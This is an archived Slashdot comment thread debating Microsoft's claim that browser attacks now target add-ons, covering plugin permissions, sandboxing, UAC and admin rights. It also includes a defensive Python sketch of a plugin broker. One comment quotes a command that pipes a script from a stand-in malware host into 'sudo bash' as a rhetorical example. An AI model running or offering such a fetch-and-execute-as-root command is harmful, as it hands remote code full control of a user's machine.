Slashdot Mirror


Microsoft Blames Add-Ons For Browser Woes

darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.' This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"


  1. Duh by Drinking+Bleach · · Score: 5, Insightful

    Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?

    !news

  2. I'll still blame you for everything else. by retech · · Score: 5, Insightful

    Craptacular interface, ignoring standards, sluggish, bloated, lacking usable features... I'm sure I've missed some.

    1. Re:I'll still blame you for everything else. by stewbacca · · Score: 5, Informative

      You forgot the "embedded video frequently doesn't play even though it's a Microsoft codec" bit.

    2. Re:I'll still blame you for everything else. by gmack · · Score: 5, Funny

      That would be an add-on problem.

    3. Re:I'll still blame you for everything else. by xonar · · Score: 2, Interesting

      A microsoft addon, divx anyone?

    4. Re:I'll still blame you for everything else. by Kamokazi · · Score: 2, Insightful

      To be fair to Microsoft (And a disclaimer, I primarily use Opera myself):

      -I don't find the interface any more or less intuitive than FF3 or Opera. I am used to Opera, so I know it better. I've never really had to hunt for an option in any of them...everything is all generally in a logical spot.

      -IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didn't pass Acid2 until FF3. And IE8 is shipping in a standard-compliant mode by default, which should help all browsers out.

      -Sluggish...compared to FF3 and Opera. But it was faster than FF2 for several different languages...so then FF2 was also sluggish, by your standards.

      -Bloated? How? I really don't see any bloat compared to other browsers.

      -What features do you expect from it out of the box? Seems to do about the same as the others, plus or minus some minor stuff.

      (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

      --
      As our way of thanking you for your positive contributions to Slashdot, you are eligible to disable Slashdot 2.0.
    5. Re:I'll still blame you for everything else. by Anders · · Score: 5, Funny

      (Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)

      Much more needed is "-1, Reverse psychology"

      (runner-up is "+1, your uid is prime")

    6. Re:I'll still blame you for everything else. by nine-times · · Score: 4, Informative

      IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didn't pass Acid2 until FF3. And IE8 is shipping in a standard-compliant mode by default, which should help all browsers out.

      Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart."

      So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed it in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent.

      But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away.

    7. Re:I'll still blame you for everything else. by BenoitRen · · Score: 3, Informative

      definately

      Definitely. Definitely!

      IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didn't pass Acid2 until FF3.

      The Acid tests are not an indicator of standards compliance. They're tests of flaws in web browsers that web developers want fixed. KHTML may have passed Acid2 first, but it had a lot of rendering flaws. When Gecko didn't pass Acid2, it had less flaws and was more standards compliant overall.

      Bloated? How? I really don't see any bloat compared to other browsers.

      Have you checked the size of the installer files? Way larger than that of any other web browser.

    8. Re:I'll still blame you for everything else. by TrebleMaker · · Score: 4, Funny

      definately

      Definitely. Definitely!

      People are going to write they way the write
      irregardless of your protests.
      You should of just, like, totally ignored him.

      --
      In Soviet Russia a beowulf cluster of these things imagines you welcoming your new, neural-network overlords.
  3. Permissions by gurps_npc · · Score: 5, Insightful

    And if the add-ons were given far more permission than they actually need? If the browser works right, then the damage a poorly written add-on can do should be minimal.

    --
    excitingthingstodo.blogspot.com
    1. Re:Permissions by TheRaven64 · · Score: 4, Interesting

      Ideally, most of these plugins should be setuid as nobody, run in a separate process and have their windows reparented into the browser window. I don't know of any *NIX systems that actually do this for plugins. I believe Chrome does something similar on Windows, but IE does not (although it runs the entire browser as a less-privileged process on Vista).

      --
      I am TheRaven on Soylent News
    2. Re:Permissions by geirnord · · Score: 5, Insightful

      I second that! Somewhere along the line add-ons got way too much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

    3. Re:Permissions by soniCron88 · · Score: 2, Informative

      Somewhere along the line add-ons got way too much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?

      Was there a time when plug-ins couldn't have access to the harddrive?

    4. Re:Permissions by Anonymous Coward · · Score: 5, Informative

      Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.

    5. Re:Permissions by ya+really · · Score: 4, Interesting

      IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. I'm not an MS fanboy, but can they really be blamed for shoddy coding done by third parties?

    6. Re:Permissions by ShawnCplus · · Score: 2, Informative

      That's gotta be new. Every time I've gotten within 100 yards of a site with flash Konqueror crashed.

      --
      Excuse me while I gather the virgin sacrifice and assemble the pentagram required to solve your problem
    7. Re:Permissions by gurps_npc · · Score: 4, Interesting

      Because they made it easy to write shoddy code. If you make people go through hoops to get the good stuff, then they get lazy and accept the minimum. To use a real world analogy, no, you don't need to have the same key start the car as open your front door, your mail box, and your office. If you insist on selling a car, house lock, mailbox and the office, then don't also make them use the same key for 'convenience'.

      --
      excitingthingstodo.blogspot.com
    8. Re:Permissions by catchblue22 · · Score: 4, Interesting

      IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. I'm not an MS fanboy, but can they really be blamed for shoddy coding done by third parties?

      Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly.

      I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.

      --
      This and no other is the root from which a tyrant springs; when first he appears as a protector - Plato (423 to 327 BC)
    9. Re:Permissions by Vancorps · · Score: 2, Interesting

      What everyday task does Vista bug you about authorizing?

      I've heard this a number of times how it nags people and that the initial release was rough but since SP1 I only see allow or deny when it's something I'm doing intentionally that's administrative-related, like installing an update to a program.

      I'm genuinely interested in this since I manage a lot of Windows machines and sooner or later I'll have to deal with common complaints or face turning UAC off.

    10. Re:Permissions by MadnessASAP · · Score: 4, Insightful

      Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school environments without Administrator access is impossible.

      --
      I may agree with what you say, but I will defend to the death your right to face the consequences of saying it.
    11. Re:Permissions by legirons · · Score: 3, Insightful

      IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.

      Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)

      Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)

    12. Re:Permissions by Lucky75 · · Score: 4, Interesting

      Renaming a file (extension) under program files, for example, prompts you 3x if you're sure. I think we could do without the multitude of prompts.

      Are you sure?
      Are you really sure?
      Positive?
      Ok

      --
      DNA -- National Dyslexic Association
    13. Re:Permissions by CodeBuster · · Score: 4, Interesting

      can they really be blamed for shoddy coding done by third parties?

      Yes they can and here is why:

      If a program is going to allow addons then the communications between the addons and the main application should be conducted entirely through interfaces in order to preserve abstraction and enforce Design by Contract principles. In this way addons are allowed to plug into the application at precise locations controlled by the main application and to interact with the main application abstractly and in precisely defined and limited ways. Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well designed interface contracts can support a wealth of valuable features while maintaining plug-ability and abstraction throughout the software stack. So I don't buy "It's the addons fault" since the addons, ultimately, can only do things which the main application framework has allowed them to do whether intentionally, through good abstraction, or unintentionally from poor addon framework design.

    14. Re:Permissions by Beryllium+Sphere(tm) · · Score: 2, Informative

      >IE7 is set to run in sandbox mode by default.

      I believe this is only on Vista.

    15. Re:Permissions by DarkOx · · Score: 3, Informative

      right because your typical business users would never say want to change the extension of something like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like that never happens....

      --
      Repeal the 17th Amendment TODAY! Also Please Read http://www.gnu.org/philosophy/right-to-read.html
    16. Re:Permissions by BradleyUffner · · Score: 3, Informative

      right because your typical business users would never say want to change the extension of something like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like that never happens....

      A typical business user isn't going to be storing "report.txt" in a protected system path. They are going to save it in My Documents or a subfolder, the default location presented by Vista.

    17. Re:Permissions by petermgreen · · Score: 2, Insightful

      Why do Mac users and Linux users manage to avoid most of this shit?
      I think there are two reasons

      1: there is simply less shit available for their platform
      2: mac and linux users tend to be more experienced and discerning. Nearly all newbies use windows

      --
      note: i'm known as plugwash most places but i screwd up registering that here somehow in the past and now can't register
    18. Re:Permissions by SanityInAnarchy · · Score: 4, Insightful

      Just in case anyone was going to interpret this literally:

      Ideally, most of these plugins should be setuid as nobody

      No, no, a thousand times no!

      I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.

      These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.

      The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.

      In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.

      But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!

      --
      Don't thank God, thank a doctor!
  4. I've always said this. by bigstrat2003 · · Score: 4, Insightful

    The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.

    This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.

    --
    "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
    1. Re:I've always said this. by Anonymous Coward · · Score: 3, Informative

      And if your browser isn't full of security holes, it doesn't matter which sites you go to.

      I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.

    2. Re:I've always said this. by SQLGuru · · Score: 2, Insightful

      How about a car analogy?

      If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.

      Layne

    3. Re:I've always said this. by Sloppy · · Score: 5, Insightful

      The biggest part of internet security is paying attention to where you go.

      I would agree with you, if "going" to a malware site meant

      curl ftp://malwaresite.com/malware.sh | sudo bash

      Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.

      "Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
    4. Re:I've always said this. by joeflies · · Score: 2, Insightful

      I think your theory works for preventing the majority of issues, but it doesn't solve the problem. Just because you're careful, all it takes is one click to the wrong site, whether it be from a link in a forum, a search result, or clicking a known good server that has been owned, and you're infected. The problem is that the security of the browser should prevent somone from taking over your machine.

      You can avoid walking down dark alleys at night, and you significantly cut down on your chances of getting mugged. But that doesn't make you mugging-proof.

    5. Re:I've always said this. by bigstrat2003 · · Score: 4, Informative

      This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.

      Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.

      Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.

      And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.

      --
      "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
    6. Re:I've always said this. by uniquename72 · · Score: 2, Funny

      In fairness to gp, looking at someone through a telescope isn't entirely risk-less, either. They could, for example, shine a laser back at you and destroy your retina. Or pull a goatse, resulting in same.

  5. But remember by dedazo · · Score: 5, Insightful

    If it's Firefox, it's perfectly OK to blame the add-ons.

    Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.

    And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.

    --
    Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
    1. Re:But remember by xant · · Score: 2, Insightful

      I think the point has always been that it was easier to fix those leaks in the add-ons than to implement draconian quotas on add-ons in the browser.

      They were able to fix it to some degree, but all it's doing is preventing poorly-written addons from leaking memory. I think protecting the user from his addons is a superior technical solution, but it isn't Firefox's "fault" that the addons were written poorly.

      And I would in fact apply the same argument to IE and extend it to Windows: plugins to IE causing problems? Disable the plugins, not IE. Drivers making windows bluescreen? Blame the drivers, not Windows.

      But still try to sandbox things a little better so buggy extension code doesn't kill the experience.

      --
      It's rare that you're presented with a knob whose only two positions are Make History and Flee Your Glorious Destiny.
  6. Bullshit. Plain utter bullshit. by syousef · · Score: 4, Insightful

    Many non-power-users don't use addons at all.

    If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

    --
    These posts express my own personal views, not those of my employer
    1. Re:Bullshit. Plain utter bullshit. by EvanED · · Score: 4, Insightful

      Many non-power-users don't use addons at all.

      And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

    2. Re:Bullshit. Plain utter bullshit. by athakur999 · · Score: 4, Insightful

      Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.

      If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.

      --
      "People that quote themselves in their signatures bother me" - athakur999
    3. Re:Bullshit. Plain utter bullshit. by TheRaven64 · · Score: 2, Interesting

      Can anyone point to an add-on that has more users than ANY brand of browser?

      Sun Java? Adobe Flash? Not sure about the former does, but the latter has a much bigger installed-base than IE.

      --
      I am TheRaven on Soylent News
    4. Re:Bullshit. Plain utter bullshit. by Jamie's+Nightmare · · Score: 2, Informative

      Many non-power-users don't use addons at all.

      That's incorrect. Most of them install the add-ons without really knowing what they are doing, or don't uncheck the box that says "Install this tool bar you don't want" when installing software.

      --
      "When you see a unixer brainwashed beyond saving, kick him out of the door." - Xah Lee
    5. Re:Bullshit. Plain utter bullshit. by nschubach · · Score: 2, Informative

      Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence.

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    6. Re:Bullshit. Plain utter bullshit. by clodney · · Score: 2, Informative

      I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc.

      Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed.

    7. Re:Bullshit. Plain utter bullshit. by Fujisawa+Sensei · · Score: 2, Interesting

      Many non-power-users don't use addons at all.

      If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.

      Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets.

      --
      If someone is passing you on the right, you are an asshole for driving in the wrong lane.
    8. Re:Bullshit. Plain utter bullshit. by vux984 · · Score: 2, Informative

      And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.

      To be fair, those often get loaded by accident - as part of installing adobe reader, or java, or skype, or whatever, and of course its defaulted to install, so unless you read every page of the installation wizard, they get you.

    9. Re:Bullshit. Plain utter bullshit. by Zerimar · · Score: 2, Insightful

      No matter how many times I remove Google and Yahoo toolbars from my Dad's PC, it always gets reinstalled. Too many freeware apps come with it "pre-checked" during installation, and too many users just click "Yes" or "OK" on every prompt.

  7. Tied down! by Anonymous Coward · · Score: 2, Insightful

    Its browser woes are because the browser is the operating system and the operating system is the browser. Tie the two together and you reap what you sow!

  8. I think they have a point.. by Anonymous Coward · · Score: 4, Funny

    With the likes of ActiveX, and Silverlight out there, who could blame IE?

    1. Re:I think they have a point.. by Ethanol-fueled · · Score: 3, Insightful

      Finally!

      28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.

      Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

    2. Re:I think they have a point.. by bigstrat2003 · · Score: 2, Insightful

      Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!

      Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.

      --
      "16MB (fuck off, MiB fascists)" - The Mighty Buzzard
    3. Re:I think they have a point.. by greg_barton · · Score: 4, Insightful

      Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to have no problem doing this, so why can't Windows?

  9. Speaking of add-ons by Anonymous Coward · · Score: 5, Insightful

    Would an example of this include the Active X Control you have to install to be able to run Windows Update?

  10. Plugin model by Enderandrew · · Score: 4, Insightful

    Aren't they responsible for the plugin model in their browser? Aren't they responsible for the OS security?

    Take a look at how Chrome handles plugins and then try to pass the buck.

    --
    http://blindscribblings.com - Tasty pop-culture in conceptual fashion.
    1. Re:Plugin model by benjymouse · · Score: 3, Informative

      Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc.

      Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.

      If a plugin needs more advanced access than what is provided by this broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability) which enabled a security researcher to execute a program on the Vista in the pwn2own contest.

      Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adamant that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rogue process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.

      --
      Reading slashdot one-liner: (irm http://rss.slashdot.org/Slashdot/slashdot).rdf.item | fl title,desc*
    2. Re:Plugin model by Anonymous Coward · · Score: 2, Interesting

      Yes, they are responsible for the plug-in architecture. However, the architecture only provides the mechanism through which the plug-ins are loaded and communicate with the browser, they don't provide any further facility. The plug-ins are simply binaries which are loaded into the process space of the browser. The browser process dictates the security context under which the plug-in will execute. In all browsers on all platforms if the plug-in has a vulnerability exploiting that vulnerability gains the attacker the same privileges as exploiting the browser itself, which is generally the privileges of the current user.

      The best route is to run the entire browser within a constrained security context. Internet Explorer 7.0 running on Vista with Protected Mode enabled, which is the default, runs under such a constrained context. It may be possible to exploit the browser or a plug-in but that exploit will be severely limited. For example, not long after Vista was released a vulnerability was identified in the library responsible for loading animated cursor files. The vulnerability could be successfully exploited on Windows XP and Windows Vista, but if protected mode was enabled the exploit was unable to deliver its payload on Vista.

      What Chrome attempts to do is to load the plug-ins into child processes of the browser. This is done for reliability purposes, not security. Unlike the renderer child processes, the plug-in child processes are not constrained using the Windows job API. A vulnerable plug-in would be just as exploitable. The reason Google did not lock down the plug-in child process is because the plug-ins do not expect to be hosted outside of the browser process. This by itself has caused a lot of problems and the Chrome code has hard-coded a number of behaviors specific to certain plug-ins simply to ensure that they work. Flash, for example, is still rendered within a window handle owned by the browser process. Chrome has taken a novel approach, but it is not sustainable.

      In my opinion there needs to be a collaborative effort in order to design a new plug-in architecture and framework under which it is assumed that the plug-in will be loaded outside of the browser process as well as executed within an extremely tight sandbox. All interaction between the plug-in will be carried out by a specific API and any action the plug-in attempts to make outside of the sandbox must be negotiated through a broker API. This would effectively combine the approaches taken by Google and Microsoft. However, I don't think that either company has the ability to pull off such a change alone, which is why I call for a collaborative effort which would include at least Microsoft, Apple, Google and the Mozilla Foundation, perhaps under the supervision of a standards body such as ECMA.
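
The brokered design proposed in the comment above, sketched as an added example (not part of the original comment and not code from any browser): the plug-in runs as a separate process and every file access it wants goes through a deny-by-default broker. The `Broker` class, the JSON request format and the file names are assumptions made for illustration, and the OS-level confinement of the child process is assumed rather than shown.

```python
import json, os, pathlib, subprocess, sys, tempfile

# Constructed plug-in: a separate process whose only channel is requests to the broker.
PLUGIN_SRC = r'''
import json, sys
for req in ({"op": "read", "path": "movie.swf"}, {"op": "read", "path": "../secret.txt"},
            {"op": "exec", "path": "cmd.exe"}):
    print(json.dumps(req), flush=True)   # ask the broker
    sys.stdin.readline()                 # block until it answers
'''

class Broker:
    """Deny by default: only 'read', and only inside the plug-in's own directory."""
    ALLOWED_OPS = ("read",)

    def __init__(self, root):
        self.root = os.path.realpath(root)

    def decide(self, line):
        try:
            req = json.loads(line)
        except ValueError:
            req = None
        if not isinstance(req, dict) or req.get("op") not in self.ALLOWED_OPS:
            return {"ok": False, "why": "operation not brokered"}
        # Canonicalise before checking, so '..' and symlinks cannot leave the root.
        target = os.path.realpath(os.path.join(self.root, str(req.get("path", ""))))
        if os.path.commonpath([self.root, target]) != self.root:
            return {"ok": False, "why": "path outside sandbox root"}
        try:
            with open(target, "rb") as fh:
                return {"ok": True, "size": len(fh.read())}
        except OSError as exc:
            return {"ok": False, "why": type(exc).__name__}

def run_plugin(root, plugin_src=PLUGIN_SRC):
    # Host the plug-in out of process and answer every request line it sends.
    broker, verdicts = Broker(root), []
    cmd = [sys.executable, "-c", plugin_src]
    with subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, text=True) as child:
        for line in child.stdout:
            verdicts.append(broker.decide(line))
            print(json.dumps(verdicts[-1]), file=child.stdin, flush=True)
    return verdicts

def demo():
    with tempfile.TemporaryDirectory() as root:
        pathlib.Path(root, "movie.swf").write_bytes(b"FWS" + bytes(13))  # constructed 16-byte file
        return run_plugin(root)
```

Calling `demo()` returns one verdict per request: the in-directory read is granted, while the `..` traversal and the unlisted `exec` operation are refused without the broker touching the file system.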

  11. Largely yes and largely ignorance (mitigation) by betelgeuse68 · · Score: 4, Interesting

    Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as "root"!!! ("administrator" in the Windows vernacular)

    I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:

    http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515

    The installer will create shortcuts for IE and Firefox but if you look carefully it's really a program with the browser .EXE passed as an argument.

    Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.

    This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.

    (Some caveats)

    This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).

    If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpdate.

    And finally, to convince yourself the utility does something useful, go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).

    Maybe I'll educate some % of the IT world yet...

    Respectfully,
    -M

    1. Re:Largely yes and largely ignorance (mitigation) by betelgeuse68 · · Score: 2, Insightful

      But tell me FreakinSyco... how many people, think Joe and Jane Sixpack, run with non-administrative accounts at home under Windows XP?

      Even worse, 99% of IT people will do the same, i.e. rely on anti-virus vs. the principle of least privilege which they'll call out in a heartbeat on *NIX ("Don't run as root!!!") but fail to do the same when at home under Windows XP. It's largely a user education issue. Few people know about the tools Windows does offer and assume it's completely insecure (that's not true).

      Further, lots of Windows software has assumed the user DOES have administrative privileges. At one point in time Google Desktop would simply not run in a non-admin desktop. Other software dating back to Windows 9x was also guilty of this. Until a couple of years ago Winamp failed to run if you were not an administrator. Why? Because it stored its configuration (Winamp.ini) in C:\Windows and it maintained global settings for the entire machine via the deprecated GetPrivateProfileString and WritePrivateProfileString APIs dating back to Windows 3.x.

      Do you think your average user would likely have such information? Or even care? They just want software to work!

      This tool is a compromise. 1) People don't like passwords. 2) Most Windows XP users run as administrators with nary an understanding of the dangers; getting them to change to a non-admin account has many, MANY barriers. 3) This tool is a compromise.

      If you run as "god"/root/administrator then by proxy as your browser pulls in crap off the Net, guess what's going to happen? Yes, security issues will persist, such as cross site scripting, but which would you rather have, a browser flaw that at most might steal some file on your system or getting your machine instrumented with a root kit? No system is 100% secure but the key is to minimize exposure.

      RemoveAdmin leverages a security API that's actually part of Windows Vista as well. If you have an end user that has foolishly turned off UAC, this tool will work there. It will also work with Windows 2000.

      -M

  12. This is too fun by Anonymous Coward · · Score: 5, Funny

    I like the sex analogies; I think this should be a new standard for /.

    Yours has some good points but:

    Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.

    Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?

    1. Re:This is too fun by Bargeld · · Score: 3, Funny

      >>I like the sex analogies; I think this should be a new standard for /.

      Nonstarter. Reader-base is unfamiliar with the interface.

      Back to car analogies please.

      --Bargeld

      --
      "I hate to advocate drugs, alcohol, violence, or insanity to anyone. But they've always worked for me." --Dr. Hunter S.

  13. What about kde-gnash? by mangu · · Score: 4, Informative

    There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.

    You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.

  14. ABM by YetAnotherBob · · Score: 2, Insightful

    This is marketing. Blame ABM, Anybody But Microsoft.

    Truth is that IE is not the best browser, but is better than it was.

    Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.

    Why is any of this news? It is really just a marketing department's attempt to deflect blame away from where it belongs.

    --
    Everybody knows 3 people with my name.

  15. First Hand Refutation by Cormophyte · · Score: 2, Informative

    I installed Windows Vista on my Mac Pro in order to run the one program I wanted that I couldn't get for Mac OS the other day (Fallout 3) and while waiting for the install to finish I viewed a few web pages. I'm not talking about pornindex2000.ru here, however it wasn't cnet, either. On a scale of amish to thai hooker I was in solid girl in high school who smoked out back territory.

    In any case, I didn't really care what sort of virus or malware or autodialer or rootkit or killprog or hypnotoad I picked up because it would steal my Fallout saved games and then be deleted along with the ntfs partition when I was done playing. However, out of curiosity I installed virus protection some days later and lo and behold within about four or five domains on a fully updated Vista and completely unmodified IE7 I had picked up something. Either a production install of Fallout gave me something, or it was IE. Sooo, no, MS. Go directly to jail, do not collect my license fee.

  16. He's right you know ... by Luscious868 · · Score: 3, Funny

    'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said.

    And if you believe that I've got this great piece of land I'd like to sell you.

  17. It's still your damn fault by BlueParrot · · Score: 4, Insightful

    Now let's see... why is it that we need addons for something as simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.

  18. ActiveXploit by VGPowerlord · · Score: 3, Funny

    Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever?

    --
